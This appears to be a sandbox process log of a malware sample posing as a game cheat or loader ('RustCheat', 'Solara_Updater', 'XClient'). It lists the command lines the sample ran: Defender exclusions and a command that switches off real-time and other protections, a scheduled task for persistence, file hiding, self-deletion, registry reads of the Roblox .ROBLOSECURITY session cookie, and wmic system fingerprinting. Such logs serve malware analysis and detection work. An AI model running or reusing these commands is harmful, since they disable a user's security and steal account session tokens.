"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Program Files\Windows Mail\en-US\sppsvc.exe

"C:\Program Files\Windows Mail\en-US\sppsvc.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\system32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\system32\taskeng.exe

taskeng.exe {916FEB13-D21F-486C-91A1-F1FED06CA314} S-1-5-21-2737914667-933161113-3798636211-1000:PUMARTNR\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

